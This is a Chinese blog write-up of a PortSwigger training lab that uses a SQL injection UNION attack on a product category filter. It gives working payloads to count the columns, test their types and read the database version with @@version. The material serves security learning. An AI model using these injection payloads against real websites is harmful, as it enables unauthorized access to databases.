某不知名博客
clincat
2023-03-14
目录

从业者-信息查询-MySQL和Microsoft的数据库类型和版本

# 实验室:SQL注入攻击,查询MySQL和Microsoft的数据库类型和版本

# 题目

此实验室在产品类别筛选器中包含SQL注入 (opens new window)漏洞。您可以使用 UNION 攻击从注入的查询中检索结果。

若要解决实验室问题,请显示数据库版本字符串。

提示

您可以在我们的SQL注入备忘单 (opens new window)上找到一些有用的有效负载。

实验室-从业者

SQL注入攻击,查询MySQL和Microsoft的数据库类型和版本 >>

- name: 实验室-从业者
  desc: SQL注入攻击,查询MySQL和Microsoft的数据库类型和版本 >>
  avatar: https://fastly.statically.io/gh/clincat/blog-imgs@main/vuepress/static/imgs/docs/burpsuite-learn/public/lab-logo.png
  link: https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-mysql-microsoft
  bgColor: '#001350'
  textColor: '#4cc1ff'
1
2
3
4
5
6

# 实验室

根据题意,可得实验目标:

  • 在产品类别筛选器中 执行SQL注入UNION攻击,并查询数据库软件版本

点击 “Access the lab” 访问实验室

实验室页面如下

找到产品类别筛选器,通过 UNION SELECT 查询空字符,判断原始查询列数

  • 此处列数为2
' UNION SELECT NULL,NULL-- qwe
1

判断列数据类型

  • 两列都可以作为字符串数据进行查询
' UNION SELECT 'abcdefg','hijklmn'-- qwe
1

查阅SQL注入备忘单,找到MySQL和Microsoft的版本查询语法,这两个数据库软件的 版本查询语法相同

SELECT @@version
1

查询版本

' UNION SELECT @@version,'hijklmn'-- qwe
1

实验室提示我们完成了实验

编辑 (opens new window)
从业者-信息查询-Oracle的数据库类型和版本
从业者-信息查询-在非Oracle数据库上列出数据库内容

从业者-信息查询-在非Oracle数据库上列出数据库内容

最近更新
01
API测试笔记
04-30
02
msfvenom
03-29
03
Metasploit
03-29
更多文章>
Theme by Vdoing | Copyright © 2023-2024 Carsaid | MIT License